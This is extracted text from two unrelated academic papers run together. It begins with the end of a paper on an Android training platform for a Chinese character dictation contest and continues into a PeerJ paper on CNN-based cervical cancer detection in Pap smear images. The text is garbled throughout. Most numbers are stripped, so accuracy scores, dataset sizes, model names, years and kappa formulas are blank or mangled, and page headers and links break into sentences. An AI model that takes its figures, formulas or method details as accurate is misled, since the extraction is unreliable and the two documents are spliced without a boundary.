communication, achieving the correct timing and answer transmission with the send and receive functions. students through the android based training platform can experience a specific communication process. es presentation layer session layer transport layer network layer datalink layer physical layer es relay system transmission medium application layer network layer datalink layer physical layer network layer datalink layer physical layer application layer presentation layer session layer transport layer network layer datalink layer physical layer relay system figure . network osi reference model application layer ftp、telnet、http、dns snmp、tftp、ntp、dns transport layer network layer tcp udp ip the host to the network layer network access layer socket figure . tcp/ip architecture a particular communication process: the server first starts the service, the establishment of socket and begins to listen to the state and waits to connect, and start the service. the client press the start button, set the client writing time and other display information. the client enters into the connection state, the client answers. after entering the answer and establish a connection with the server, the answer is sent to the server-side. ) complete class diagram of the integrated training platform design the comprehensive training platform design and development uses the currently popular object-oriented approach. the design of the class and the various types of functional methods are: the boot interface start, write interface class hztxview, write control class hztx, and internal class (answer list class datilistener, end of the answer list class jieshulistener, timing class mycount), writing action classes myaction and subclasses (writing class mypath and erase class myeraser), etc. … ) timing statistics function when the pc server sends a start entering command, the android client counts down based on the received time and displays the correct answer at the end of the time for the judges and the audience to end the competition. the server can view all teams and player scores and rankings, and to send the required information to the client. v. conclusion writing chinese characters is the transmission of chinese civilization, enhance the understanding of chinese culture, and increase the love of our country. the development of the integrated training platform for writing chinese characters provides a good platform with good social benefits. the comprehensive training platform for chinese character dictation competition exceeds the basic requirements of school chinese characters. to process information and the final score and display on the big screen for the judges and the audience in public places for judgments meets the requirement of fairness for the competition. through the training platform to create a way for students to take the initiative, self-learning environment, students can systematically master the basic knowledge of software engineering and software development of the whole process; train software engineering students other comprehensive ability, easy to use, functional software for the professional, to provide a complete, actual, open and simulated training integrated network platform. acknowledgment project support: ministry of education "chunhui plan" cooperation research project project, project number: z references [ ] chinese character dictation conference, official website http://tingxie.cntv.cn/ [ ] wood grain. a cultural reflection from "dictation" [j]. trade unions, : . [ ] li jiake .android comprehensive training platform analysis and development. lanzhou jiaotong university master's degree thesis, . [ ] zhang shicheng. based on google android platform application development and research [j]. computer knowledge and technology, ( ): - . [ ] yang fengsheng .android application development secret [m]. beijing: machinery industry press, : - . [ ] he baohong. from the fixed internet to the mobile internet [j]. information and communication technology, ( ): - . [ ] in-stat. g internet applications will usher in blowout [j]. weekly computer news, ( ): - . article in a conference proceedings. [ ] h. goto, y. hasegawa, and m. tanaka, “efficient scheduling focusing on the duality of mpl representatives,” proc. ieee symp. computational intelligence in scheduling (scis ), ieee press, dec. , pp. - , doi: . /scis. . . http://tingxie.cntv.cn/ cervical cancer detection in pap smear whole slide images using convnet with transfer learning and progressive resizing cervical cancer detection in pap smear whole slide images using convnet with transfer learning and progressive resizing anant r. bhatt ,*, amit ganatra ,* and ketan kotecha centre of excellence for artificial intelligence, military college of telecommunication engineering, mhow, madhya pradesh, india devang patel institute of advance technology and research, charotar university of science and technology, changa, gujarat, india symbiosis centre for applied artificial intelligence, symbiosis international (deemed university), pune, maharashtra, india * these authors contributed equally to this work. abstract cervical intraepithelial neoplasia (cin) and cervical cancer are major health problems faced by women worldwide. the conventional papanicolaou (pap) smear analysis is an effective method to diagnose cervical pre-malignant and malignant conditions by analyzing swab images. various computer vision techniques can be explored to identify potential precancerous and cancerous lesions by analyzing the pap smear image. the majority of existing work cover binary classification approaches using various classifiers and convolution neural networks. however, they suffer from inherent challenges for minute feature extraction and precise classification. we propose a novel methodology to carry out the multiclass classification of cervical cells from whole slide images (wsi) with optimum feature extraction. the actualization of conv net with transfer learning technique substantiates meaningful metamorphic diagnosis of neoplastic and pre-neoplastic lesions. as the progressive resizing technique (an advanced method for training convnet) incorporates prior knowledge of the feature hierarchy and can reuse old computations while learning new ones, the model can carry forward the extracted morphological cell features to subsequent neural network layers iteratively for elusive learning. the progressive resizing technique superimposition in consultation with the transfer learning technique while training the conv net models has shown a substantial performance increase. the proposed binary and multiclass classification methodology succored in achieving benchmark scores on the herlev dataset. we achieved singular multiclass classification scores for wsi images of the sipakmed dataset, that is, accuracy ( . %), precision ( . %), recall ( . %), f- beta ( . %), and kappa scores ( . %), which supersede the scores obtained through principal methodologies. gradcam based feature interpretation extends enhanced assimilation of the generated results, highlighting the pre-malignant and malignant lesions by visual localization in the images. subjects artificial intelligence, computer vision, data mining and machine learning, data science keywords cervical cytology, cervical cancer, transfer learning, papanicolaou smear, progressive resizing, convolution neural network, sipakmed, herlev, metamorphic analysis, deep learning how to cite this article bhatt ar, ganatra a, kotecha k. . cervical cancer detection in pap smear whole slide images using convnet with transfer learning and progressive resizing. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted december published february corresponding author anant r. bhatt, capt.anant@gmail.com academic editor rajanikanth aluvalu additional information and declarations can be found on page doi . /peerj-cs. copyright bhatt et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:capt.�anant@�gmail.�com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ introduction the global cancer burden is estimated to have risen to . million new cases and . million deaths in . one in five men and one in six women worldwide develop cancer during their lifetime, and one in eight men and one in women die from the disease. explicitly, cervical cancer is the fourth most common malignant tumor threatening women’s health, especially in developing countries. the total number of cervical cancer cases in reported by the world health organization (who) was , , and the number of deaths equal to , cervical cancer ranks fourth for both incidence ( . %) and mortality ( . %) (world health organization, b). cervical cancer develops in a woman’s cervix (the uterus’s entrance from the vagina). human papillomaviruses (hpv)—a ubiquitous virus infection—is a primary cause of cervical cancer in % of the cases. persistent infection of hpv leads to develop cervical cancer in women progressively. uncontrolled growth of cells caused due to antiapoptotic mutations results in a lump of mass referred to as a tumor, and tumor buds can spread infections to other body parts, leading to severe medical conditions. the mortality and morbidity rate remain high if not detected/cured in due time (world health organization, a). studies suggest that cervical cancer can be treated successfully if the precancerous lesions are detected in time during cytological screening and human papilloma virus (hpv) test (saslow et al., ). hpv vaccination and detection/treatment are prevention methods in practice. cervical cancer can be evicted by initiating proactive measures to prevent, carry out regular screening tests and treatment. the conventional papanicolaou test (papanicolaou & traut, ), also called the pap smear test, is an important stage for mitigating the rising challenge of cervical cancer. a skilled pathologist identifies carcinoma signatures by analyzing morphological features of the cells in microscopic slides manually. since the manual analysis is subjective to the expert’s knowledge of the disease’s etiology and experience, it may lead to many true negative or false-positive results, leading to incorrect diagnoses and treatments. also, screening tests carried out in mass imply a higher turn-around for results and substandard screening analysis. the non-availability of expert pathologists and suitable infrastructure restricts cervical cancer screening drives in developing countries. deep learning techniques provide a prodigious prospect for enhanced interpretation and analysis of the pap smear images during metamorphic diagnosis of neoplastic and pre-neoplastic lesions. since the cells’ morphology undergoes distinct changes during infections, they play a decisive role in identifying carcinoma signatures in pap smear image. hence, deep learning techniques can extract relevant morphology features and carry out whole slide image analysis to identify carcinoma conditions. we followed the bethesda system (tbs) (solomon et al., ), which explains the cytological classification based on standard medical terms to describe abnormal findings from cps and lbc. although the convolution neural networks (cnn) can extract, identify, and classify the carcinoma cells, we elaborate on a novel methodology to improve morphological features’ extraction, thereby increasing accuracy, sensitivity, specificity, and f scores. state of the art implementation of various cnns with transfer learning and progressive resizing bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ techniques present a definitive approach for enhanced learning and effective classifications of carcinoma cells. we studied current implementations/methods on the cervical cancer datasets. we analyzed the datasets and reviewed the recent work, that is, k-means clustering, sbrg algorithm (isa, ). it detects the edges of multiple cells/the region of interest (roi). in addition to the edge detection method, we explored different supervised and unsupervised techniques (plissiti, nikou & charchanti, ; plissiti et al., ). in these approaches, detection of nuclei locations was carried out, followed by a refinement step which used this nuclei information (circumference of the nuclei) was performed. few of them were followed by a classification algorithm to detect the abnormal cells in the images. both supervised and unsupervised techniques, that is, support vector machines and fuzzy logic, were applied. we also studied various classifiers, that is, k-nearest neighbour, stochastic gradient descent, support vector machines (cortes & vapnik, ), and random forest. one of the approaches, that is, deeppap (zhang et al., ), was also studied in detail. in deeppap, classification was performed on cropped images (single-cell cropping was carried out considering nuclei as the centroid). however, these methodologies suffer from prominent challenges as follows:- . it depends on the localization of nuclei; . detection and classification of images of a single cell only; . comparatively substandard feature extraction for unclear/blurred visual exposure of overlapping cells; . single-cell classification implies binary classification. we propose a methodology to subdue the existing binary classification scores and propose a multi-class classification for single-cell and whole slide images of cervical cancer datasets, following the bethesda system. the proposed approach of superimposing progressive resizing with transfer learning on cnn yields promising multi-class classification scores with improved visual inferences. deep learning models are known to have limited interpretability, and it is a challenging and active area of research (simonyan, vedaldi & zisserman, ). to enhance the interpretability, we implemented a complementary interpretation with intuitive saliency maps (gradcam) visualisation. gradcam aids in apprehending the features learned by our model to ensure a high level of transparency in visual interpretation (zhang, nian wu & zhu, ). we carried out experiments on two different datasets obtained from different institutes/university. to summarize, our contributions are as follows: . to the best of our knowledge, the proposed work is the first implementation to present a singular multi-class classification methodology for neo-plastic and pre-neoplastic lesion detection in whole slide images. . our experiments achieved state-of-the-art performance scores for binary and multi-class classification on herlev and sipakmed datasets. bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . the cnn implementation with progressive resizing and transfer learning techniques yields significant improvements and generated benchmark scores for multi-class classification for whole slide images of the sipakmed dataset, which helps in carrying out metamorphic analysis even for overlapping cell lesions. . the article also brings out the comparative study of the results produced by various classifiers and advanced cnn models (trained using transfer learning and progressive resizing techniques) on herlev and sipakmed datasets. . gradcam based feature interpretation extends enhanced assimilation of the generated results, highlighting the pre-malignant and malignant lesions by visual localization in the images. datasets we carried out experiments on herlev and sipakmed (plissiti et al., ) databases separately. herlev database-created at the herlev university hospital, denmark, utilizing a digital camera microscope and contains images of single cells. skilled cyto-technicians and doctors have annotated each cell into one of seven classes (i.e., superficial squamous epithelia, intermediate squamous epithelia, columnar epithelial, mild squamous non-keratinizing dysplasia, moderate squamous non-keratinizing dysplasia, severe squamous non-keratinizing dysplasia, and squamous cell carcinoma). the morphological features (i.e., cell shape, nucleus size, nucleus to cytoplasm ratio, nucleus opacities, nucleus dying intensities, cytoplasm opacities, and cytoplasm dying intensities) help differentiate the cells. the sipakmed database consists of , annotated images that have been manually cropped from cluster cell images by the expert cytopathologists into five categories. the cells are classified as normal cells under two types (superficial-intermediate, parabasal), as abnormal cells are classified into two categories (koilocytotic and dyskeratotic), and as benign categorization (metaplastic) cells. the dataset distributions for herlev and sipakmed datasets are shown in figs. and , respectively. the specimen pap smear images of the herlev dataset and sipakmed dataset are shown in figs. and . proposed methodology we have objected our work to carry out experiments on binary classification for herlev and sipakmed datasets using k-nearest neighbour, stochastic gradient descent, support vector machine, and random forest classifiers. then, convolution neural network models, that is, vgg- (simonyan & zisserman, ), resnet- (szegedy et al., ), and efficientnet-b (tan & le, ) were employed to carry out binary classification where cnns have shown considerable improvements in the results compared to other classifiers. we carried out due customization of the final layers of cnn models for multi-class classifications for the herlev and sipakmed datasets. we used pre-trained weights from the imagenet dataset (referenced as transfer learning (pan & yang, )) with superimposition of progressive resizing techniques while training the cnn models to train cervical cancer datasets. finally, the multi-class classification experiments highlight enhanced results for both datasets. saliency maps for whole slide images bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ improve assimilation along with classification scores. figure illustrates the proposed methodology to generate classification results with saliency map employing convolution neural networks using transfer learning and progressive resizing techniques. the figure the herlev cervical cancer dataset distribution, categorized into seven classes. full-size doi: . /peerj-cs. /fig- figure the sipakmed cervical cancer dataset distribution, categorized into five classes. the distribution of full cell images at (a) and whole slide image in the datasets at (b) are shown. full-size doi: . /peerj-cs. /fig- figure single cell images from the herlev dataset, categorized into seven classes and shown as (a) superficial squamous epithelia, (b) intermediate squamous epithelia, (c) columnar epithelial, (d) mild squamous non-keratinizing dysplasia, (e) moderate squamous non-keratinizing dysplasia, (f) severe squamous non-keratinizing dysplasia, (g) squamous cell carcinoma in situ. full-size doi: . /peerj-cs. /fig- bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ implementation consists of four stages: ( ) data preprocessing, ( ) model implementation, ( ) training strategy, ( ) testing. data preprocessing since data augmentation acts as a regularizer and helps reduce overfitting while training the machine learning model, we used data augmentation techniques to expand the training dataset’s size artificially. we created modified versions of the dataset’s images. we generated skillful models with improved ability to generalize and classify the images by training the deep learning models on more data variations. we implemented transformation techniques to generate cell image variations as the cells are invariant to figure single-cell images from the sipakmed dataset, categorized into five classes: (a) superficial-intermediate cells, (b) parabasal cells, (c) metaplastic cells, (d) dyskeratotic cells, and (e) koilocytotic cells. full-size doi: . /peerj-cs. /fig- figure the methodology with inference pipeline used to analyze the pap smear (whole slide) images using convnets (trained using transfer learning and progressive resizing techniques) to generate predictions and activation map. full-size doi: . /peerj-cs. /fig- bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the rotations. we carried out these transformation with, value of θ = − to degrees, α = . − . , pa = . and pb = . while employing the following techniques:- . horizontal flipping of the images with a probability of pb. . we applied rotations to the images due to their rotational invariance. . random scaling of α with a probability of pa. model implementation herlev and sipakmed datasets incorporate single-cell images. whole slide images (wsi) of the sipakmed dataset which expose varied intensity (average intensity, average contrast), texture (smoothness, uniformity, third moment, entropy), and shape features (area, major and minor axis length, eccentricity, orientation, equivalent diameter, solidity, and extent). the proposed cnn implementation deliberate on effective cell morphology feature extraction, that is, cell cytoplasm, cell shape, nucleus type, hyperchromicity, dying exposures of cells, and cell edges. we experimented vgg- , resnet- , resnet- , efficientnet-b , efficientnet-b , and efficientnet-b models. as efficientnets (image classification models) scale more efficiently by balancing the network’s depth, width, and resolution deliberately over other cnns, we carried out experiments on efficientnet models to enhance performance. we have customized the output layers to suitably perform binary and multi-class classification (tan & le, ). the values of the hyperparameters have been optimized while carrying out experiments. to implement transfer learning, we used pre-trained weights obtained after training the model on a large dataset (i.e., imagenet) while re-training the cnns on the herlev and sipakmed datasets. we applied the progressive resizing technique by running the iterations repetitively to extract the optimum weights with precise feature extraction. these optimum weights were carried forward to the experiments’ subsequent iteration, where we resized the images from to , , , and progressively and ran the experiments. iterations outcomes were analyzed continuously to achieve the best of the classification scores. training strategy among the family of efficientnet models, we used efficientnet-b , b , and b cnn models with pre-trained weights obtained from the imagenet large scale visual recognition challenges dataset with , classes. models’ customization at the final classification layer was applied to classify the cells into the desired output classes. while training the model for the herlev dataset and sipakmed dataset, the final classification layers were customized to classify seven and five classes, respectively. training and test data were split into the : ratio. transfer learning and progressive resizing techniques were employed while re-training the cnn models to leverage the imagenet pre-trained model’s features. we used categorical cross—entropy as the loss function. the learning rates were optimized using the -cycle policy, which helped achieve super-convergence with faster training, ensuring optimum regularization (smith & topin, ). we used bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ weight decay wd and discriminative learning rates since different layers capture different types of information. it allows us to preserve the filters in the layers closer to input learned by efficientnet on the imagenet dataset. the network was trained with adamw optimizer (loshchilov & hutter, ). the learning rates were scheduled using a -cycle policy, which enables super-convergence, allowing faster training of neural networks with substantial learning rates and regularization, preventing overfitting (yosinski et al., ; smith, ). the learning rates were determined using the lr finder (howard & gugger, ). learning rate was optimized after each epoch to identify the optimal learning rate for the subsequent epoch. figure illustrates the learning rate finder’s employment before the first and the third training iterations of the resnet- model on the herlev dataset. model customization and experimentation we carried out binary classification on the herlev dataset using k-nearest neighbour, stochastic gradient descent, support vector machine, and random forest classifiers. we applied resnet- and efficientnet-b model to improve the binary classification scores. we used the transfer learning technique to train the vgg- (baseline), resnet- , resnet- , efficientnet b , efficientnet b , and efficientnet b models for multi-class classification on the herlev dataset. we used discriminative learning rates to preserve the lower level features and regulated the higher-level features for optimum results. the vgg- model was trained on both the datasets to carry out binary and multi-class classification as part of the first conv net implementation. in vgg- , convolution layers that analyze the input image features are referred to as “backbone” and balance of the culminating linear layers—referred to as “head.” “head” converts the analyzed features into predictions for two classes in our binary classification. to train the model with differential learning rates, we split the head from the architecture’s balance. we replaced it with an adaptiveconcatpool layer, flatten layer, and blocks of batch normalization, figure loss function graphs while training the resnet- cnn model on herlev dataset. the learning rate graphs generated after the first iteration (consisting of epoch) and the third iteration (consisting of epochs) using lr finder are shown at (a) and (b), respectively. full-size doi: . /peerj-cs. /fig- bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dropout, linear, and relu layers, respectively. the adaptiveconcatpool layer helps preserve the backbone’s feature representations more effectively than using only the maxpool layer or the averagepool layer. also, we appended a fully-connected layer of and units with softmax activation as final classification layer for herlev and sipakmed datasets, respectively. we carried out suitable customization of all the conv net for respective datasets, which attained improved performance scores. hyperparameters—the properties that govern the entire training process and determines the network structure were carefully optimized. learning rate was optimized after each epoch to identify the optimal learning rate for the subsequent epoch. we determined the number of epochs and activations functions, considering numerous experimental results, and used suitable optimized values while carrying out experiments. efficientnets—image classification models scale more efficiently by deliberate balancing the network’s depth, width, and resolution. hence, the models have demonstrated enhanced performance. we have customized the output layers suitably for binary and multi-class classification (tan & le, ) on both the datasets. we carried out experiments on efficientnet b , b , b , b , b , and b . though the efficientnet higher variants, that is, b -b , have larger width, depth, or resolution, the accuracy gain was saturating/stable compared to the b model, which demonstrated the limitation of a single dimension scaling. hence, experiments were carried out on efficientnet b , efficientnet b , and efficientnet b . we used the baseline efficientnet-b model for binary and multi-class classification on our cervical cancer datasets. for wsi image analysis, we used the progressive resizing technique (howard & gugger, ) on these convolutions neural network models. we trained the model with imaging, sized × , to obtain the weights. then using these weights, we trained the model with resized the wsi images and iterated the model’s training repetitively by gradually increasing imaging sizes to × , × , × , followed by unfreezing saved weights (from the previous iteration) every time as each larger-scale model incorporates the previous smaller-scale model layers and weights. we observed significant results by following the strategy. figure shows the implementation methodology of progressive resizing on the whole slide images by applying the obtained weights from one to the next training model by scaled-up image resizing. testing during the testing, we resized the input image to (h × w) size and gave the resized images as input to the networks to predict the output class. for all the tasks on the sipakmed dataset, we used -fold and -fold cross-validations with the data split released along with the dataset. results and discussion evaluation parameters as the accuracy in isolation does not prove the model’s efficacy, we have evaluated the model based on the performance metrics. the performance of the model is ascertained post-study of the scores, that is, accuracy (acc), precision, sensitivity (sens), specificity (spec), h-mean, f -score, or f-beta, and kappa score followed by an independent manual bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ analysis by the pathologists. sensitivity or recall measures the proportion of actual abnormal cells that are predicted correctly in the same class. specificity measures the proportion of actual negatives and correctly identified as such. accuracy is the overall percentage of correctly identifying the cells belonging to the respective classes correctly. f score is a classifier metric that calculates a mean of precision and recall. accuracy ¼ tp þ tf tp þ tf þ fp þ fn precision ¼ tp tp þ fp figure the implementation methodology for the progressive resizing technique with transfer learning using the efficientnet cnn model. pre-trained weights obtained by training the model on large datasets are taken as initializing weights on the model (a) (i.e., imaging input size of × pixels initially), and then carry forward the obtained weights to subsequent models (b) and (c), (i.e., imaging input size to × pixels and × pixels respectively) to extract optimum features and enhanced efficiency progressively. full-size doi: . /peerj-cs. /fig- bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ recall ¼ tp tp þ fn f ¼ � precision � recall precision þ recall ¼ � tp � tp þ fp þ fn we used cohen’s kappa score (cohen, , ), which is a statistical measure for measuring “intra-rater reliability” and is a more robust measure than simple percent agreement calculation. it is a measure of agreement between observations and can be defined for two observers and where disagreement was weighted without taking into account the distance between categories. the weighted kappa statistic κw for two observers and ensures that there is no weighted kappa statistic for more than two observers. we have used the following notation is used: � n the number of cases/observations. � n the numbers of raters/observers. � k the number of categories in which a case can be rated. cohens weighted kappa κw is derived from the normal kappa by including a weight function w. if w is chosen the identity matrix ik, then cohens κw is identical to cohens κ. a linear weight is commonly chosen, which is calculated as: wij ¼ � ji � jj k � : ( ) alternatively, a quadratic weight could be used: wij ¼ � ði � jÞ =ðk � Þ . then: poðwÞ ¼ n xk i¼ xk j¼ wijfij; ( ) peðwÞ ¼ n xk i¼ xk j¼ wijricj; ( ) with ri and cj again the row and column sums. the weighted kappa statistic is now given by: jw ¼ poðwÞ � peðwÞ � peðwÞ : ( ) quantitative results results obtained for binary classification using k-nearest neighbour, stochastic gradient descent, support vector machine, random forest classifier, resnet- , and efficientnet-b models on herlev and sipakmed datasets are presented in this section. for the herlev dataset, the resnet- and efficientnet-b models produced benchmark binary classification scores with . % accuracy, . % precision, . % recall, . % specificity, and . %f -score and . % accuracy, . % precision, . % bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ recall, . % specificity, and . % f-beta score. table illustrates the quantitative comparisons of binary classification results (herlev dataset) obtained by experimenting with k-nearest neighbour, stochastic gradient descent, support vector machine, and random forest classifier, resnet- , and efficientnet-b models. figure shows the binary classification of an abnormal single-cell image using resnet- (trained on herlev dataset) and resnet- (trained on sipakmed dataset) cnns. the results of the sipakmed dataset are also shown in the table. figure shows the confusion matrices generated using k-nearest neighbour, support vector machine, stochastic gradient descent, random forest for binary classification on the herlev dataset. table illustrates the quantitative comparison of multi-class classification results (herlev dataset) obtained by experimenting with vgg- , resnet- , resnet- , figure the binary classification predictions generated using resnet- (trained on herlev dataset) and resnet- (trained on sipakmed dataset) for a single-cell image. the resnet- and resnet- cnn generated predictions with . % and . % for an abnormal single-cell image input (shown at (a)). the gradcam visualization and cnn feature interpretation, obtained using resnet- , are shown at (b) and (c), and resnet- are shown at (d) and (e), respectively. full-size doi: . /peerj-cs. /fig- figure the confusion matrices for binary classification predictions at (a) support vector machines, (b) stochastic gradient descent, (c) k-nearest neighbour, and (d) random forest confusion matrices on the herlev dataset. full-size doi: . /peerj-cs. /fig- bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ efficientnet b , efficientnet b , efficientnet b , and efficientnet b models. multi-class classification scores on sipakmed dataset obtained by implementing vgg- , resnet- , resnet- , and efficientnet-b (baseline) using transfer learning viz-a-viz of efficientnet-b using transfer learning, and progressive resizing technique are also shown in the table . the resnet- (baseline) and efficientnetb ( × ) with progressive image resizing attained the highest scores. implementations with the proposed technique table the binary classification prediction scores for herlev and sipakmed cervical cancer datasets under evaluation criteria, that is, accuracy, precision, recall, f -score, and kappa score. the table demonstrates the scores for various binary classifiers and cnn models, that is, k-nearest neighbour, support vector machine, stochastic gradient descent, random forest, resnet- (base- line), and efficientnet-b (baseline). model accuracy (%) precision (%) recall (%) f -score (%) k-score (%) herlev dataset k-nearest neighbour . . . . – support vector machine . . . . – stochastic gradient descent . . . . – random forest . . . . – sipakmed dataset resnet- . . . . . efficientnet-b . . . . . table the multi-class prediction scores for the herlev and sipakmed cervical cancer datasets under evaluation criteria, that is, accuracy, precision, recall, f-beta, and kappa score. multi-class classification convolution neural network used the k-fold cross-validation techniques, which showed a substantial increase in scores. the efficientnet-b in consultation with transfer learning and progressive resizing generated benchmark scores for whole-slide images of the sipakmed dataset. model k-fold cv accuracy (%) precision (%) recall (%) f-beta (%) kappa score (%) herlev vgg -fold . ± . . ± . . ± . . ± . . ± . resnet- -fold . ± . . ± . . ± . . ± . . ± . resnet- -fold . ± . . ± . . ± . . ± . . ± . efficientnetb -fold . ± . . ± . . ± . . ± . . ± . efficientnetb -fold . ± . . ± . . ± . . ± . . ± . efficientnetb -fold . ± . . ± . . ± . . ± . . ± . sipakmed vgg -fold . ± . . ± . . ± . . ± . . ± . resnet- -fold . ± . . ± . . ± . . ± . . ± . resnet- -fold . ± . . ± . . ± . . ± . . ± . efficientnetb -fold . ± . . ± . . ± . . ± . . ± . efficientnetb -fold . ± . . ± . . ± . . ± . . ± . efficientnetb -fold . ± . . ± . . ± . . ± . . ± . efficientnetb -fold . ± . . ± . . ± . . ± . . ± . bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ have attained perfect scores in sensitivity, specificity, and the best kappa scores. f -scores of these models indicate the robustness in multi-class classification. efficientnet b models have been evaluated against all possibilities of overfitting. the multi-class classification results demonstrated improved feature extraction and computation efficiency with progressive resizing. figure shows the confusion matrices of the multi-class classification generated using efficientnet-b cnn on the sipakmed dataset. we did experiments on efficientnet b with pre-trained weights and training them on × , × , × , and × progressively. the -fold cross-validation indicates that the model did not overfit. results validation we used the annotated herlev and sipakmed datasets. however, the data were analyzed and reviewed by an expert pathologist in a secondary care hospital. an extensive set of whole slide images were shown to the experts for manual analysis and inspection to acquaint the dataset. we carried out validation tests to ascertain the results generated by the system. the validation was carried out by manual kappa score tally. × whole slide images were segregated for the validation test, which was not part of training/testing datasets. independent pathologists and the trained model were given × wsi images one by one for analysis. the system prediction scores were tallied with expert analysis. out of × wsi images, × wsi results matched. the expert could not interpret one wsi image due to low image quality. observer bias was ruled out for each diagnosis, under the same microscopic setup and view by taking in the review of two more pathologists to authenticate diagnosis by the system. figure the confusion matrices at (a) and generalized score at (b) for multi-class classification results (for sipakmed dataset) obtained with the efficientnet-b model. the benchmark classifi- cation score highlights the optimum results achieved by employing transfer learning in consultation with progressive resizing. full-size doi: . /peerj-cs. /fig- bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ saliency maps we generated grad-cam heat-maps using the final layer of a convolution neural network. to assimilate the results generated by the system and enhanced manual validation, saliency maps, that is, gradient-weighted class activation map (gradcam) was implemented (selvaraju et al., ). in adaptive average pooling, we took the average of all the × × channels. we converted them to a tensor of , followed by multiplying the tensor with size ( × no. of classes) to get the final output. while validating multi-class experiments for whole slide pap smear images, we took five classes. the values represented the features extracted by the convolutions layers, which are matrices. we took the first cell’s average across every channel to show activated areas when the model predicted a specific class. to generate the heatmaps, we used “hooks.” figure shows the grad-cam for various class inputs by highlighting the feature extraction and predictions for abnormal and benign wsi classes. conclusions in this research, we proposed a binary and multi-class classification pipeline for identifying carcinoma in pap smear images to carry out metamorphic diagnosis of neoplastic and pre-neoplastic lesions. we are inspired by the emerging role of cnns to aid medical imaging-based diagnostics, which can play as a digital second opinion to improve palliative care. the proposed pipeline starts with a cervical cell recognition stage. to begin with, we carried out experiments with binary classifiers and obtained performance scores. towards the further enhancements, we improved resnet- , resnet- , and efficientnet b models’ performance with transfer learning. the resnet- and efficientnet b trained with the transfer learning technique showed a significant increase figure the model generated gradient-weighted class activation maps for the input pap smear images, respectively. input pap smear and generated gradient-weighted class activation maps show results for (a) abnormal ‘koilocytotic,’ (b) benign ‘metaplastic,’ and (c) abnormal ‘dyskeratotic’ classes. full-size doi: . /peerj-cs. /fig- bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in performance, achieving . % accuracy, . % precision, . % recall, . % specificity, . % f -score, and . % accuracy, . % precision, . % recall, . % specificity, the . % f-beta score for sipakmed dataset, respectively. in a later stage, we carried out multi-class classification experiments on both datasets. we addressed a problem that has not been addressed effectively by any literature, that is, whole slide image analysis with multi-class classification. we proposed a novel approach of implementing progressive resizing and transfer learning on deep neural network models, which attained state-of-the-art computational efficiency and best of the scores for accurate classifications. convolution neural network model- efficientnet-b trained using transfer learning, and progressive resizing showed promising multi-class classification results. we achieved benchmark scores on wsi by effectively analyzing multi-layer cervical cells with, that is, . % accuracy, . % precision, . % recall, . % specificity, and . % f-beta score. we outperformed other techniques cited in recent literature, consistently in both types of classification problems. we ascertained the system generated predictions by a validation test where an expert’s manual analysis was tallied with prediction. we also showed the model’s transparency by visualizing the features learned by saliency maps, which enabled us to visualize the cnn generated predictions. acknowledgements we want to dedicate the work for humanity and the people working unflinchingly towards exploring remedies to cure cervical cancer infections. we also thank dr. ragini thapa, a graded pathologist, for valuable medical inputs and extending help in manual validation of the pap smear image samples. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � anant r. bhatt conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � amit ganatra conceived and designed the experiments, prepared figures and/or tables, and approved the final draft. � ketan kotecha analyzed the data, authored or reviewed drafts of the paper, validation of results, and approved the final draft. bhatt et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: source code is available in the supplemental files. data are available at the herlev cervical cancer database (http://mde-lab.aegean.gr/ index.php/downloads; specifically part ii: "new pap-smear database (images)") and the sipakmed cervical cancer database (https://www.cs.uoi.gr/~marina/sipakmed.html; data from all cell categories were used). supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references cohen j. . a coefficient of agreement for nominal scales. educational and psychological measurement ( ): – doi . / . cohen j. . weighted kappa: nominal scale agreement with provision for scaled disagreement or partial credit. psychological 